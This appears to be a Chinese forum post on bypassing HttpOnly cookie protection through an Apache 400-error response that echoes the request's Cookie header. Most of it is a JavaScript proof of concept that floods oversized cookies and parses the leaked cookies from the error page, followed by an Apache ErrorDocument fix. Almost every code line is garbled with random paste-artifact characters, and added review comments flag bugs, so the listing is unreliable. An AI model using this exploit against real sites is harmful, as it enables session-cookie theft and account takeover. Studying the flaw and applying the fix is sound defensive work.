很多程序以及一些商业或成熟开源的 CMS 文章系统,为了防止 XSS 盗取用户 Cookie,一般都会给 Cookie 加上 HttpOnly 属性,禁止直接通过 JS 读取用户 Cookie,从而降低 XSS 的危害;而本文所述的问题恰好可以用来绕过 Cookie 的 HttpOnly 属性。
用 Chrome 打开一个站点,按 F12 打开开发者工具,在 Console 中输入如下代码并回车:
% S8 E) s A( {. w% R! K5 ~ 0 z3 Q9 q. {: s5 S
// http://www.exploit-db.com/exploits/18442/
/**
 * Writes ten cookies xss0..xss9 on path "/", each carrying the 819-byte
 * filler built below, or — when `good` is truthy — rewrites each of them
 * with an already-elapsed `expires` date so the browser discards it.
 * The oversized cookies presumably push the request's Cookie header past
 * the server's request-header size limit so that it answers 400 — TODO
 * confirm against the advisory linked at the end of the page; the page
 * itself only states that the 400 response echoes the cookies.
 * NOTE(review): this listing carries forum paste artifacts on many lines
 * and will not run as pasted; the canonical version is the exploit-db
 * link directly above.
 * @param {boolean} [good] - truthy: expire the xssN cookies; otherwise set them
 */
function setCookies (good) { C; e% \) G3 r& ]/ ^" I
// Build the 819-character filler value used for every xssN cookie
var str = "";. W9 s ^$ i% G. p1 T7 b D, f
for (var i=0; i< 819; i++) {: a6 Z" b: K" W* u7 L+ q
str += "x";. V' `0 p/ V# j6 e) |
}; ?6 e( I& j6 A" g: x: d
// Ten cookies: either expire them (good) or set them with the filler value
for (i = 0; i < 10; i++) {) O0 X5 @# ^' h
// good: rewrite xssN with an expiry in the past so the browser drops it
; h& {. H% M1 @& `if (good) {
' t+ K) j, P- f2 }var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";$ h4 G2 I r6 J! h
}
( s4 N/ R" d% q% L+ L// otherwise: xssN = <819 x's> on path "/"
1 g& p7 Z5 Q, i! \: W8 m# {else {9 I5 q; }# Y3 T) c
var cookie = "xss"+i+"="+str+";path=/";
. }% y+ N7 k" M; t ^4 |}
j' I9 k" P+ P5 cdocument.cookie = cookie;+ \2 N) X) a# I9 f- J
}
) x) Q( e8 `, q9 [/ u0 H3 v}
/**
 * Sends a GET "/" probe and, when the server answers 400 and echoes the
 * request's Cookie header inside a <pre> block, parses that echo into an
 * object and shows it via alert(). This is how the script reads cookies
 * that document.cookie hides from JS (HttpOnly).
 * Defensive note: the leak only exists while the 400 response body
 * contains the offending request header; the fix described further down
 * this page (a fixed ErrorDocument 400 message, or upgrading Apache)
 * removes that echo.
 * NOTE(review): this listing carries forum paste artifacts on many lines
 * and will not run as pasted; see the exploit-db link above the listing.
 */
1 y+ D( ?' r6 o4 Pfunction makeRequest() {
# c+ p, V1 o1 \0 l' DsetCookies();
/**
 * readystatechange handler; closes over `xhr`, which is declared (hoisted)
 * further down in makeRequest.
 */
M% k1 `$ }6 F6 b' i0 Rfunction parseCookies () {+ ?' X( ]! W1 f9 b, I3 Q
var cookie_dict = {};
7 P: H n) `% M% Q% c( Z// Only act on a completed request that came back as 400
if (xhr.readyState === 4 && xhr.status === 400) {
2 q; h2 e( Q5 S1 ~, I$ ^+ [, j2 E8 b// Drop CR/LF, then capture what the server put inside <pre>...</pre>
" Y/ L0 [ s% D, L+ Vvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);, |5 f* U3 B( l) ?9 Z! j6 F, v' I
// NOTE(review): match() returns null when there is no <pre>, so this .length check would itself throw
if (content.length) {
0 k3 j5 K& F7 F// Strip the "Cookie: " header name from the echoed header
content = content[1].replace("Cookie: ", "");& e2 A( |/ S+ s L
// Remove the xssN filler cookies, then split the remainder on ';'
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
Y1 ^, g3 J' b! C5 W( [6 c8 j// Collect name=value pairs into cookie_dict
2 i# f( K) Q8 \% I! ^( kfor (var i=0; i<cookies.length; i++) {. D( b- w" I3 n6 [2 ?
// NOTE(review): `cookies` is an array here, so .split is not a function; this line differs from the linked original
var s_c = cookies.split('=',2); v% r: u: j4 ^- O1 I3 f$ i
cookie_dict[s_c[0]] = s_c[1];3 z& w) C2 u( d, M
}3 k6 s$ U7 |. L, t1 j- E, A; F2 }
}2 G9 N- g6 M( v0 t' W
// Expire the xssN filler cookies again (see setCookies)
setCookies(true);
// Show the recovered cookies
M5 e I1 X! m( Valert(JSON.stringify(cookie_dict));
( z% C, q5 c) C0 l. m}/ I4 H; _) J2 x+ A9 q4 u, {3 g: h
}
" ?! W- ] v6 B0 U6 f- Y// Issue the asynchronous probe request to "/"
$ R0 Y Q0 u- _) Dvar xhr = new XMLHttpRequest();
& H: E& I, }5 ~. J' K1 S0 J( o: Qxhr.onreadystatechange = parseCookies;
+ W& ^8 ]+ u5 S0 _xhr.open("GET", "/", true);; F# W4 s2 F+ c5 q' I+ |8 w% Z
xhr.send(null);# S2 q. i0 }7 s7 @- |. N( P
}6 N/ S& k! x+ x* A8 u7 Y5 u
// Entry point: sets the filler cookies, sends the probe and alerts the result
makeRequest();
) e- N, z9 o9 S
你就能看见华丽丽的 400 错误响应中包含着 Cookie 信息。
2 `3 X5 P9 ~7 }3 E7 D
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download
+ M8 W1 u9 m& {' N" l
修复方案:
Apache 官方提供 4 种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下:
, D& e1 r4 l, f3 _* l; Q
In the event of a problem or error, Apache can be configured to do one of four things,
) g) h4 Y* x% @1 U! H5 u
1. output a simple hardcoded error message(输出一个简单生硬的错误信息)
2. output a customized message(输出一段自定义信息)
3. redirect to a local URL-path to handle the problem/error(转向一个本地的自定义页面)
4. redirect to an external URL to handle the problem/error(转向一个外部 URL)
$ p8 L# A& ?& J6 j& r
经测试,对于 400 错误只有方法 2(在配置中直接给出一段自定义文本)有效,返回包不会再包含 Cookie 内容。
: i/ R( f& a# b0 D# Z: d! A& L$ K2 z) o5 ^8 W0 C
Apache 配置:
2 ?8 ~( A" V* {' s) P) n' Y
ErrorDocument 400 "security test"
" c& u0 N* Y. O1 {2 y+ B0 c$ u: L& o5 O* {9 s" b
当然,升级 Apache 到最新版本也可以:)。
1 s* @; {/ Q: ?; F; z% G
参考:http://httpd.apache.org/security/vulnerabilities_22.html
( [6 C5 n% ]% @! D9 {
|